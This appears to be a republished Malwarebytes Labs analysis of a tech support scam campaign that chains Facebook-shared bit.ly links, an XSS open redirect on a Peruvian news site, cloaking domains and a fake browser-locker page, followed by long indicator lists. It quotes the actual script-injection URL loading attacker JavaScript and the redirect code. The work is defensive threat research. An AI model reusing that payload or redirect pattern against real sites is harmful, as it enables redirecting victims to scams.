XSS to TSS: tech support scam campaign abuses cross-site scripting vulnerability

Malwarebytes Labs–

Tech support browser lockers continue to be one of the most common web threats. Not only are they a problem for end users who might end up on the phone with scammers defrauding them of hundreds of dollars, they’ve also caused quite the headache for browser vendors to fix.

Browser lockers are only one element of a bigger plan to redirect traffic from certain sites, typically via malvertising chains from adult portals or sites that offer pirated content.

There’s a slightly different campaign that we’ve been tracking for several weeks due to its high volume. Threat actors are relying on Facebook to distribute malicious links that ultimately redirect to a browser locker page. Their approach is interesting because it involves a few layers of deception including abusing a cross-site scripting vulnerability (XSS) on a popular website.

Malicious links shared via Facebook

Links posted onto social media platforms should always be scrutinized as they are a commonly abused way for scammers and malware authors to redirect users onto undesirable content. For this reason, you might see a disclaimer when you click on a link, warning you that it could be spam or dangerous.

The campaign we looked at appears to exclusively use links posted on Facebook, which is fairly unusual considering that traditionally tech support scams are spread via malvertising. Facebook displays a warning for the user to confirm that they want to follow the link. In this case, the destination is further obscured by the fact that the link is a bit.ly shortened URL.

The threat actor is using the bit.ly URL shortener to craft the first stage of redirection. In total, we catalogued 50 different bit.ly links (see IOCs) over a 3 month period, suggesting that there is regular rotation to avoid blacklisting.

Although we do not know exactly how these links are being shared with Facebook users, we have some indication that certain games (i.e. apps on the Facebook site) may help to spread them. Because this is out of our reach, we have alerted Facebook in case it is able to identify the exact source.

Abuse of cross-site scripting vulnerability

The bit.ly URL triggers the second stage redirection that involves a Peruvian website (rpp[.]pe) which contains a cross-site scripting vulnerability (XSS) that allows for an open redirect. Threat actors love to abuse open redirects as it gives some legitimacy to the URL they send victims. In this instance, the news site is perfectly legitimate and draws over 23 million visits a month.

In this case, we can see that code is being passed into the URL in order to load external JavaScript code from buddhosi[.]com, a malicious domain controlled by the attackers.

rpp[.]pe/buscar?q=hoy%3Cscript%20src=%27https://buddhosi[.]com/210c/
?zg1lx5u0.js%27%3E%3C/script%3E&fbclid={removed}

The JavaScript in turn creates the redirection to the browlock landing page by using the replace() method:

top.location.replace('https://BernetteJudeTews[.]club/home/anette/?
nr=855-472-1832&'+window.location.search.substring(1));

Besides redirecting users to other sites, an attacker could exploit the XSS to rewrite the current page into anything they like.

We reported this issue to Grupo RPP but have not heard back at the time of publication.

Cloaking domains

The open redirect trick is something that was added later on in the campaign. Originally the threat actors were directly loading decoy cloaking domains. Their purpose is to check incoming traffic and only serve the malicious content to legitimate victims. This is a very common practice and we’ve seen this before, for example with fake recipe sites.

We documented 6 domains involved in this third stage of the redirection process:

buddhosi[.]com
joinspinclass[.]com
suddhosi[.]com
thourwiringus[.]com
totalgodin[.]com
tuoliushigao[.]com

Server-side checks ensure visitors meet the requirements, namely a legitimate US residential IP address, and custom JavaScript is then served (an empty JavaScript is returned for non-interesting traffic).

The code (shared above) loads the browser locker landing page to one of the disposable and randomly-named domains using one of the newer TLDs:

.casa
.site
.space
.club
.icu
.bar

We collected close to 500 such domains (see IOCs) during a period of a few months, but there are likely many more.

Browser locker at the end of the chain

The browser locker fingerprints the user to display the appropriate version for their browser. It shows an animation mimicking a scan of current system files and threatens to delete the hard drive after five minutes.

Of course this is all fake, but it’s convincing enough that some people will call the toll-free number for assistance. In all, we collected almost 40 different phone numbers (see IOCs) but this is not an exhaustive list.

This is where it ends for the traffic scheme, but where it truly begins for the tech support scam. We did not make contact with the call centre, but we know very well how this next part plays out.

Malwarebytes users were already protected against this browser locker, thanks to our Browser Guard web protection. We will continue to track and report this campaign.

Thanks to Marcelo Rivero for helping with the replay and Manuel Caballero for his insights on the XSS.

Indicators of Compromise

Bitly links

bit[.]ly/2BnL1gb
bit[.]ly/2BT9fyU
bit[.]ly/2Ci8vU7
bit[.]ly/2CmSeNo
bit[.]ly/2CYEQ2V
bit[.]ly/2D1Xt64
bit[.]ly/2Do8rTA
bit[.]ly/2DoLMGh
bit[.]ly/2DpBAO3
bit[.]ly/2W5TLOW
bit[.]ly/2WggcRI
bit[.]ly/2Whuz8f
bit[.]ly/3ffMoLv

bit[.]ly/2XylAQS
bit[.]ly/2YQ6Nll
bit[.]ly/2YUEJh1
bit[.]ly/2Z8u2Y6
bit[.]ly/2Zf9f5g
bit[.]ly/30B8frz
bit[.]ly/30OBrge
bit[.]ly/312yDMe
bit[.]ly/2E4iPQg
bit[.]ly/2EVqXDf
bit[.]ly/2NJPNad
bit[.]ly/2SKSKtG
bit[.]ly/2W0EVJx

bit[.]ly/313QfpY
bit[.]ly/31nuzVZ
bit[.]ly/33j18GQ
bit[.]ly/33RHphZ
bit[.]ly/33TnMGp
bit[.]ly/33U4KzW
bit[.]ly/36XhNlF
bit[.]ly/39kxqT9
bit[.]ly/39Lpf2I
bit[.]ly/3a1vjnz
bit[.]ly/3ehykAR
bit[.]ly/3eQ8Rib
bit[.]ly/3fDTxpu

bit[.]ly/3fNbwdP
bit[.]ly/3gfDRJw
bit[.]ly/3gi7sTi
bit[.]ly/3gSXmbh
bit[.]ly/3gvG3gI
bit[.]ly/3hlBUvE
bit[.]ly/3iLGu8b
bit[.]ly/3jcvfVC
bit[.]ly/3jk66sh
bit[.]ly/3jU5Q3Z
bit[.]ly/3kgIwxF

Cloaking domains

buddhosi[.]com
joinspinclass[.]com
suddhosi[.]com
thourwiringus[.]com
totalgodin[.]com
tuoliushigao[.]com

Browlock domains

abagailliondaye[.]site
addiatraciedur[.]casa
adianaeadmundfaunia[.]casa
adriaensherveymanson[.]space
aidadarnallkondon[.]casa
ailynhoratiowallford[.]space
akselholm[.]space
alanaweekes[.]casa
alexandervolodin[.]site
alexaschulteisz[.]space
alexinasandersjeddy[.]casa
alexinemunroelanni[.]space
alineorbadiahbakerman[.]space
allegradoyclaudette[.]space
almedacorbiemyrta[.]club
alondramendez[.]space
aloysiapatbergwall[.]space
altapippomarjory[.]casa
alvenystrom[.]site
alysonbartolemohaze[.]casa
amandarocha[.]site
amandisamsonpattin[.]space
ameliabernays[.]bar
ameliebrown[.]icu
amiesinclair[.]space
anallesewolfiecacie[.]space
andreachrissyglaudia[.]space
andrewvasiliev[.]space
angelicajohnsen[.]casa
angelilaireberns[.]space
annadianakelleybowra[.]space
annalisearchylandau[.]casa
annicecurreyinglebert[.]site
anthewaltonbacon[.]casa
anupakarinen[.]space
aputsiaqjosefsen[.]space
arlienerutgeremmey[.]site
arlindapaulotrix[.]casa
ashlyjdavielonee[.]site
audricpanetier[.]space
aurooragabrielepahl[.]site
auroraaylmarosmo[.]casa
avalundstrom[.]casa
balazsforgacs[.]space
barbialbiedanit[.]space
beatrizmartins[.]space
beaurbandonoho[.]casa
belindapattinyorick[.]site
benbaxter[.]casa
berenicebrighamklug[.]site
bertapisano[.]casa
bertharockwellgans[.]space
bertinarothesmerolda[.]site
bertinebrendintremml[.]casa
bertyemmanuelbeaufert[.]site
bettineallynnoemi[.]casa
billyemichelethacher[.]casa
billygreen[.]casa
blaireredemalee[.]space
boriskapalfi[.]casa
caitlinluigigypsie[.]casa
caitlinpetersen[.]space
callumlittle[.]site
calvinbridges[.]club
careyheinrikornstead[.]space
carlaellwoodobadiah[.]casa
carlyejoaquinfrederica[.]site
carlynnshelldorey[.]space
carmeltristanjeremiah[.]casa
carolinepeadarstutman[.]space
carynkristoforopleione[.]site
catharinaewansouthworth[.]space
celiechristofferrochester[.]casa
celinagrahamtollmann[.]site
charlesthornton[.]bar
charleyferguson[.]space
cherilynrolferoselin[.]casa
cherishhurleyburrus[.]casa
cherlyncourtgrannias[.]site
cherylkristopherannice[.]site
chicasackville[.]casa
chicovangriensven[.]site
christacullinclem[.]space
christinehermansen[.]space
christoperkim[.]club
chrysaheinrikromo[.]space
cibranjasso[.]casa
cilkabuddieradmen[.]space
clarettanicolahannus[.]site
clareykonstantinelipkin[.]site
clariangieeddi[.]space
codieriewebb[.]site
colenerodricksipple[.]space
colettenildelaney[.]space
collycazlal[.]club
constantachaddcoleen[.]space
coralineottomalcom[.]space
cornelagregoireriannon[.]casa
correnaosbornwatters[.]space
corriethaddusnero[.]casa
courtnaycullanartimas[.]space
courtneydunn[.]site
courtneyshaw[.]casa
csabatotth[.]space
cybilloatesotho[.]club
cynthiejoshuagoetz[.]casa
dagurarnbjarnarson[.]space
daniaumbertobraunstein[.]site
darellecorteldridge[.]space
darlaleopoldlandri[.]space
darlenegarcia[.]space
deanstreeten[.]club
debbynoelfugazy[.]casa
diederikfaro[.]casa
ditajaridhancock[.]space
dominicbyrne[.]club
donaldking[.]casa
donatilavela[.]casa
doniellejarrettherwick[.]space
doratiboldjapeth[.]casa
dorelleolinsiusan[.]casa
dorenerossclemente[.]casa
dorisferguson[.]site
dorriestubridie[.]casa
dronafeliziowallace[.]club
dyannrichalona[.]site
eberardobustamante[.]casa
eboneebritseltzer[.]space
edittafanucci[.]space
eduardasantos[.]casa
edwardmarr[.]casa
elbertinawaymalina[.]site
electratobinlori[.]space
elinorecyrusrosalind[.]site
elisabetmahmudziguard[.]casa
ellasaari[.]space
ellereid[.]site
ellihermannsheldon[.]casa
emmalynhenriwinsor[.]site
erdagarephenica[.]club
erminiekurtisberard[.]site
ethelinemuffinpierrette[.]casa
ethelynezekielpepito[.]space
evagorbunova[.]space
evascarfe[.]space
evelinemikolviveca[.]space
ezinetshishani[.]casa
fancieogdanwanyen[.]site
fannymackkellby[.]site
fatramcharan[.]icu
feikjewestenbrink[.]icu
felicytasobczak[.]space
felixkomarov[.]site

fiannkipparisaac[.]casa
filidelucianrus[.]casa
floraabrahamsson[.]site
florisburrparadies[.]space
franceskint[.]casa
frankmejias[.]space
freddieholden[.]space
fredrikigland[.]site
frigyesbakos[.]club
fulcovangemert[.]casa
gabrielduffy[.]casa
gabriellacunneen[.]club
gabriellamarsden[.]space
gaynorchevaliermollie[.]space
georgecreswick[.]icu
germaisenia[.]uno
gertiereggyun[.]casa
gianninafonville[.]store
gillianlindseymobley[.]casa
ginnikipvedis[.]casa
giudittademetrestuppy[.]site
giulioferrari[.]club
glennconantkaete[.]casa
greerjorgangarcon[.]casa
gretchenmorgenfrans[.]casa
guineveremorgenphilipson[.]space
gundolphochubbbaggins[.]space
gusursongerhard[.]space
gwendolenworthcower[.]club
hamzenolet[.]space
hanabinkykasevich[.]casa
hannahkaur[.]space
harriottheodoricmartinez[.]space
heidiingamarkaenel[.]casa
hollyhardy[.]space
hopechaddbrogle[.]site
hyacinthreuvengronseth[.]casa
ileanaroryfarika[.]casa
ilonayusupova[.]space
ilsepiirto[.]casa
ingebergrudyjacintha[.]space
ingridharlinaekerly[.]casa
iolandecreightonnona[.]space
iritapietreklow[.]space
isabelaalmeida[.]site
isembardgreenhand[.]store
issysydneycharmain[.]site
isumbrasbrandagamba[.]club
ivalufilemonsen[.]casa
ivaluhansen[.]casa
ivalularsen[.]site
iversoreide[.]site
jacobsutherland[.]site
jacquelinehampson[.]space
jadechadzoara[.]casa
jaimecarliedaye[.]casa
jakebooth[.]club
jamesmiller[.]casa
jamesspofforth[.]club
jamieumstead[.]uno
janholm[.]site
jareddubose[.]space
jaromirbrynda[.]casa
jaspercaraballo[.]casa
jeanellejermainoleg[.]casa
jeannabroderickgrunenwald[.]casa
jenniferreed[.]club
jenninelammondtorto[.]site
jennovankooij[.]icu
jerrileeharrydyun[.]casa
jesperkristoffersen[.]site
jessamynfreemonhibben[.]casa
jessisylvesterkenison[.]space
jillaynemagnumallys[.]space
joaniealisteratwekk[.]casa
joanywilting[.]casa
joellydaltonhamel[.]site
joeyrudolfrebhun[.]casa
johnapascaleikey[.]casa
johnclark[.]icu
joinspinclass[.]com
jordannaholttakken[.]casa
jorgritter[.]space
josjasalah[.]site
juansmotherman[.]club
judiecosimoprudence[.]site
julieravn[.]space
juliettaheywooddunham[.]casa
kacyandershugon[.]site
kacybenoitarley[.]space
kajaaurthurzebulen[.]space
kalmandobos[.]site
karenbrands[.]casa
karitasvalberg[.]site
karlenronniesaidel[.]casa
karolgraememaye[.]space
kasperronning[.]casa
kasszaredphelan[.]space
katerinechuchowinston[.]space
katherinacedricbrynne[.]site
katinarooseveltmattox[.]space
katrinebrandt[.]casa
katushapallardolino[.]space
kauecavalcanti[.]site
kayleeamorymafalda[.]casa
keadaly[.]club
kerrychavez[.]icu
kessiaharonwentworth[.]space
kingapawlak[.]space
kippieeliasrachaba[.]space
kirakipplek[.]space
kirstialechulbard[.]space
kolosszegedi[.]site
kristelichaboderina[.]space
kristennowellsholley[.]casa
kristesylvesterblossom[.]casa
kristinejacobsen[.]site
krysiawojciechowska[.]casa
krystaltommyabell[.]casa
kylaasherrosenstein[.]space
kylamontishetrit[.]casa
laneydavinangell[.]site
larissasebastienhubie[.]space
laurelhewbasset[.]site
lauriannegermaynealithia[.]casa
lauriannetobyevalyn[.]casa
leannaralfpicardi[.]club
lechoslawczarnecki[.]site
lesliestorey[.]casa
lettiiorgoscathe[.]space
lettitracegow[.]casa
liaonio[.]site
liatimoteojacqui[.]casa
livandrea[.]icu
loisepatrickardie[.]space
lonnibasiliozirkle[.]casa
lorajerriprimavera[.]space
lorenzagiovannigiacomo[.]site
loriannalodovicoradloff[.]club
lorrinrodmignonne[.]space
lucievanrinsum[.]club
luisbarros[.]casa
lynseybrunotatman[.]casa
mabwinfrededelsten[.]space
maddyjarridolnee[.]site
madelindarrelbruyn[.]casa
marcellinevidovicmilinda[.]casa
marcoklug[.]casa
margarettedukieaeriel[.]space
margitfreedmangrider[.]site
margretedgarbabbie[.]casa
margretglynnadelice[.]casa
mariamnilsson[.]site

mariapfaff[.]casa
mariuslovstrom[.]casa
mariuszdudek[.]site
marnizebulonmarchese[.]space
masonpatel[.]space
mathildacaseopportina[.]site
maurakonradebenezer[.]club
mauritznystrom[.]space
maximinovaldes[.]casa
meghanncreightonoster[.]space
meralvangeer[.]space
merielbondonbelldas[.]space
merisbuironstatis[.]casa
merrillingeroscar[.]club
merryfabioavruch[.]space
meyaakesson[.]casa
mialeistad[.]space
mieszkoczarnecki[.]space
mikaelenoksen[.]site
milissentflorychard[.]casa
miriamvernesopher[.]space
mirnaandreyfischer[.]casa
mollieyveswestfall[.]site
monahreamonnjacintha[.]casa
morganajehukinchen[.]site
muirenolanhaydon[.]site
myrtleruss[.]casa
nanagal[.]icu
naomibolton[.]casa
nattybrendonleverett[.]casa
nedaholmesmilly[.]site
neddaboneamaras[.]club
nessiebogeyeugenio[.]site
nickieearliehelbona[.]site
nissaalfonsealexis[.]site
nixieholtadamski[.]space
noravestre[.]site
norbertschuil[.]casa
noreanlarsornas[.]casa
nursellamo[.]space
odelladevlinaleksandr[.]space
odettafalknerlenni[.]site
oliverraaen[.]space
olliemaclean[.]casa
omarbazhaev[.]space
paolaverhoef[.]space
peggyakselsmalley[.]site
penelopaelbertsonny[.]space
philgiordanolibbey[.]site
pongorfoldesi[.]casa
poppyinglissparke[.]casa
poulkristensen[.]space
quinnagustezandt[.]casa
rafinelisse[.]bar
ranabramran[.]casa
raquelaeduinochiles[.]casa
raymondsmith[.]casa
rayyangordon[.]casa
reavictorcherrita[.]casa
reynirjonatansson[.]site
reynirottosson[.]space
rianonkentonlira[.]space
ricagaylebernie[.]site
ricidewittflatto[.]space
riviboyceyvento[.]site
rivkahmayneazpurua[.]space
roannefrancoisgenny[.]space
roannestanislausolimpia[.]casa
robertfoley[.]space
robertsaunders[.]casa
robertweaver[.]space
ronaldestep[.]casa
ronnymortiesanburn[.]casa
rosabelleellswertheisenhart[.]casa
roseanniveadlay[.]casa
rosejaymeraouf[.]space
rosemondelelandneil[.]site
rupertaeddiefalk[.]space
sabrinagaertner[.]space
salviamugwort[.]space
samamerigoaldridge[.]site
samarialucienquinn[.]casa
samarknape[.]uno
samukatorok[.]space
sandraglebova[.]space
sanyaimmink[.]icu
sareeellereypenland[.]casa
savinareinwaldsteffen[.]site
scarlettlaycatherina[.]site
shannonmanfredoctave[.]site
shaynefrancklynwynne[.]site
sheelafarrisgare[.]casa
sheila-kathryntysonlatia[.]club
sheilayork[.]space
sherriehankcha[.]casa
sherriraddiechester[.]casa
sibyllepearcelaney[.]site
silviearaldorory[.]space
simonefreitag[.]club
sisilehoweyivanah[.]casa
siskolaatikainen[.]casa
solsausamov[.]space
starernestmcmillan[.]site
suddhosi[.]com
suewaldotacklind[.]casa
suomariihijarvi[.]casa
suzywordenmycah[.]casa
sylviakroon[.]site
tallydewsheley[.]club
taniburnabydarrill[.]casa
tanyarayhasty[.]casa
tedraadottinger[.]casa
teodorademetripettifer[.]casa
terrinathanaelgahl[.]space
theafrederiksen[.]space
thelmaantoniusibrahim[.]space
theresawalsh[.]icu
tienanevillepetrine[.]casa
tillyby[.]club
tillyheerson[.]space
timurvida[.]space
tinesidneefiedling[.]site
tomawyndhamrudolfo[.]space
topivuorinen[.]site
tordamdal[.]site
totalgodin[.]com
toussaintjobin[.]site
trinemathiasen[.]site
trudienehemiahblodget[.]space
trungbliek[.]site
utairvinshirk[.]space
veganystrom[.]space
veroniquegilbertonickey[.]casa
vesteinnyngvason[.]space
vibrockienorina[.]casa
vincenzokaur[.]space
vinniechrissiearlynne[.]site
vioarbirgisson[.]space
vitoriaoliveira[.]casa
wallislonkerrill[.]club
wilcomesandheaver[.]site
willhighett[.]club
williamsimonsen[.]casa
wynnedelmoremaison[.]space
wynnielorenprisca[.]casa
wynnyjobgratt[.]space
xavierholroyd[.]club
yingahmad[.]space
yoshikojaeheisser[.]casa
zakariaeotter[.]space
zomborgyarmathi[.]casa
zorinetownspiegelman[.]casa

Phone numbers

833-801-7232
844-762-9462
844-762-9467
844-793-6869
844-793-8637
844-794-5246
844-794-6678
844-794-6786
844-796-2946
844-833-8289

844-909-2777
855-241-4508
855-470-1718
855-470-1720
855-470-1721
855-470-1724
855-472-1830
855-472-1832
855-472-1833
855-885-0741

855-472-1840
855-472-1844
855-626-2563
855-805-1138
855-805-1278
855-805-1285
855-827-2595
855-827-3045
855-885-0784
855-885-0818

855-885-0830
855-885-0833
877-429-1222
888-597-1444
888-851-3768
888-851-5754
888-865-2158
888-866-6127
888-866-6299

The post XSS to TSS: tech support scam campaign abuses cross-site scripting vulnerability appeared first on Malwarebytes Labs.

View original article on Malwarebytes Labs

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s